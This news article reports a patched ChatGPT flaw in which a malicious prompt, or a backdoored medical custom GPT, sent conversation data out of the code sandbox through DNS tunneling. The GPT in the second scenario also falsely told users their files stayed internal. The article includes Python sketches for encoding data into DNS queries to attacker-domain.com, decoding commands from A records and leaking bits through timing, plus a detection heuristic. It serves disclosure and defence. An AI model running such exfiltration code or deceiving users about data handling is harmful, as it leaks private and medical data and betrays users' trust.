ChatGPT Bug Let Malicious Prompts Exfiltrate Data via DNS
Check Point Research disclosed a ChatGPT vulnerability that abused DNS tunneling to silently steal conversation data. OpenAI patched the flaw on February 20, 2026.
A malicious prompt could have turned any ChatGPT conversation into a covert data exfiltration channel. Check Point Research disclosed a vulnerability this week that abused DNS resolution to smuggle sensitive data out of ChatGPT's sandboxed code execution environment—without users ever knowing.
OpenAI patched the issue on February 20, 2026. No evidence suggests attackers exploited it in the wild, but the research highlights a blind spot in how AI systems handle network boundaries: DNS was considered safe infrastructure, not a potential exfiltration vector.
The Hidden Channel
ChatGPT's code execution runtime blocks conventional outbound internet access. Files uploaded for analysis stay within the sandbox. HTTP requests to external servers get blocked. That isolation is supposed to prevent user data from leaving OpenAI's controlled environment.
But DNS queries remained available. The runtime needed to resolve domain names for legitimate operational purposes, and DNS resolution appeared harmless—just translating hostnames to IP addresses. It wasn't supposed to carry data.
DNS tunneling exploits that assumption. By encoding information into the subdomain portion of DNS queries, attackers can smuggle data through DNS resolution requests. A query for sensitive_data_encoded.attacker-domain.com passes through normal DNS infrastructure while carrying a payload in the subdomain string.
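Mechanically, the encoding step is simple. The sketch below is illustrative only: the base32 alphabet, label sizes, and attacker-domain.com are assumptions for demonstration, not details from Check Point's write-up.

```python
import base64

MAX_LABEL = 63  # DNS limits each dot-separated label to 63 bytes

def encode_exfil_hostname(payload: bytes, domain: str) -> str:
    """Pack arbitrary bytes into DNS labels under an attacker-controlled domain."""
    # Base32 survives DNS's case-insensitive, restricted character set.
    encoded = base64.b32encode(payload).decode("ascii").rstrip("=").lower()
    labels = [encoded[i:i + MAX_LABEL] for i in range(0, len(encoded), MAX_LABEL)]
    return ".".join(labels + [domain])

def decode_exfil_hostname(hostname: str, domain: str) -> bytes:
    """Recover the payload on the attacker's authoritative DNS server."""
    encoded = hostname[: -len(domain) - 1].replace(".", "").upper()
    encoded += "=" * (-len(encoded) % 8)  # restore base32 padding
    return base64.b32decode(encoded)

# The sandbox only needs to *resolve* the name for the payload to leave, e.g.:
#   socket.gethostbyname(encode_exfil_hostname(b"patient: J. Doe", "attacker-domain.com"))
```

Because every resolver on the path dutifully forwards the query toward the attacker's authoritative nameserver, no direct connection between the sandbox and the attacker is ever required.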
Check Point's researchers established bidirectional communication using this technique. Outbound data went through DNS queries. Inbound commands came through DNS responses. The sandbox thought it was performing routine name resolution while actually participating in covert data transfer.
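The inbound half works the same way in reverse. One common tunneling trick (assumed here for illustration; Check Point did not publish their exact scheme) is for the attacker's nameserver to hide command bytes in the octets of A-record answers:

```python
def decode_command_from_a_records(addresses: list[str]) -> bytes:
    """Reassemble a command smuggled in the octets of A-record answers.

    Assumes the attacker's DNS server packs 4 command bytes per IPv4
    answer and zero-pads the tail: an illustrative scheme, not the one
    documented by Check Point.
    """
    raw = b"".join(bytes(int(octet) for octet in addr.split(".")) for addr in addresses)
    return raw.rstrip(b"\x00")

# In the sandbox, the addresses come back from an ordinary lookup
# (socket.getaddrinfo or similar), so the resolver itself delivers the payload.
```

TXT records offer far more capacity per response, which is why real-world DNS tunneling malware typically prefers them; A records are just the smallest possible demonstration.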
Attack Scenarios
The researchers demonstrated two concerning scenarios.
In the first, a single malicious prompt activated the exfiltration channel. Once triggered, every subsequent message in the conversation became a potential source of leakage—user text, uploaded file contents, model-generated summaries. The user had no indication that data was leaving the session.
In the second scenario, a backdoored custom GPT presented itself as a medical consultation assistant. Users uploaded lab results and described symptoms. The GPT provided helpful analysis while simultaneously transmitting patient identity and medical assessments to an external server. When asked directly whether it had uploaded data, ChatGPT confidently stated the file was only stored in a secure internal location.
That disconnect—the model falsely assuring users about data handling while actively exfiltrating through DNS—illustrates why these vulnerabilities matter. Users can't verify claims about AI system security through conversation alone.
OpenAI's Response
OpenAI confirmed it had independently identified the underlying problem before Check Point's report. The patch, deployed on February 20, blocks DNS-based exfiltration from the code execution runtime.

The company's internal discovery suggests their security team actively hunts for these issues. But the vulnerability's existence at all points to a gap in the original threat model. AI code execution environments face novel attack surfaces that traditional application security doesn't always anticipate.
Organizations using AI-powered tools for sensitive workflows should factor these risks into their evaluation processes. Trust in AI systems requires verifiable security boundaries, not assumptions about what network protocols might be abused.
Broader Implications for AI Security
DNS tunneling isn't a new technique—it's been used in malware command-and-control for years. What's new is the attack surface: AI assistants that execute code, process uploaded files, and have network access even in sandboxed configurations.
The ChatGPT vulnerability represents a class of issues rather than an isolated bug. Any AI system that:
- Executes user-provided or influenced code
- Has network access (even restricted)
- Processes sensitive user data
...faces similar risks. DNS is just one covert channel. Other side channels might exist through timing, error messages, or other seemingly innocuous system behaviors.
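The timing case is easy to demonstrate. Even with every network protocol blocked, code that controls how long an operation takes can leak one bit per observation. This toy sketch (not from the research) leaks a byte through deliberate delays:

```python
import time

SLOW, FAST = 0.05, 0.0  # seconds; a delay encodes a 1-bit, no delay a 0-bit

def leak_byte(secret: int):
    """Sandbox side: modulate observable latency, most-significant bit first."""
    for i in range(7, -1, -1):
        start = time.perf_counter()
        time.sleep(SLOW if (secret >> i) & 1 else FAST)
        yield time.perf_counter() - start

def observe_byte(durations) -> int:
    """Observer side: threshold each latency sample back into a bit."""
    value = 0
    for d in durations:
        value = (value << 1) | (1 if d > SLOW / 2 else 0)
    return value
```

At 8 bits per observed operation the channel is slow, but slow channels leaking API keys or patient names are still breaches.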
Security teams evaluating AI tools should ask harder questions about isolation guarantees. "No outbound internet access" doesn't mean "no data exfiltration" if DNS, ICMP, or other infrastructure protocols remain available.
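One concrete question worth asking: does anything inspect the DNS query names leaving the environment? Encoded payloads produce unusually long, high-entropy leftmost labels, so even a crude length-plus-entropy check catches naive tunneling. The thresholds below are illustrative starting points, not tuned production values:

```python
import math
from collections import Counter

def shannon_entropy(s: str) -> float:
    """Bits of entropy per character in s."""
    if not s:
        return 0.0
    counts = Counter(s)
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())

def looks_like_tunneling(qname: str, max_label: int = 30, max_entropy: float = 3.5) -> bool:
    """Flag query names whose leftmost label is both long and high-entropy."""
    label = qname.split(".")[0]
    return len(label) > max_label and shannon_entropy(label) > max_entropy
```

Real detection pipelines also watch query *volume* per domain, since exfiltrating a file requires many queries; a heuristic like this is one signal among several, not a complete defense.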
For organizations concerned about data leakage, our guide on data breach fundamentals explains how even small exfiltration channels can add up to significant exposure over time.
What Users Should Do
For individual ChatGPT users, the immediate risk is past—OpenAI patched this in February. But the disclosure serves as a reminder:
- Treat AI conversations as potentially observable — Don't share truly sensitive information even in "private" sessions
- Custom GPTs deserve extra scrutiny — Third-party GPTs might not have the same security review as OpenAI's official tools
- Audit uploaded files — Anything you upload for analysis enters an execution environment you don't control
The DNS tunneling bug is fixed. The next covert-channel vulnerability probably hasn't been discovered yet. Healthy skepticism about AI data handling remains warranted.
Related Articles
Custom Fonts Let Attackers Hide Commands from AI Assistants
LayerX researchers found that custom font rendering can hide malicious prompts from ChatGPT, Claude, Gemini, and other AI assistants while displaying them to users.
Mar 18, 2026

Reprompt Attack Turned Microsoft Copilot Into a Data Thief
Varonis researchers disclosed a vulnerability chain that let attackers exfiltrate user data through Copilot with a single malicious link click. Microsoft has patched the issue.
Jan 17, 2026

OpenAI Says Prompt Injection in AI Browsers May Never Be Solved
Company admits ChatGPT Atlas remains vulnerable to attacks that hijack AI agents through malicious web content. New defenses deployed, but fundamental risk persists.
Dec 28, 2025

LangChain Serialization Flaw Lets Attackers Steal AI Agent Secrets
CVE-2025-68664 scores CVSS 9.3 and enables secret extraction and prompt injection in LangChain Core. Patch immediately if you're running AI agents.
Dec 27, 2025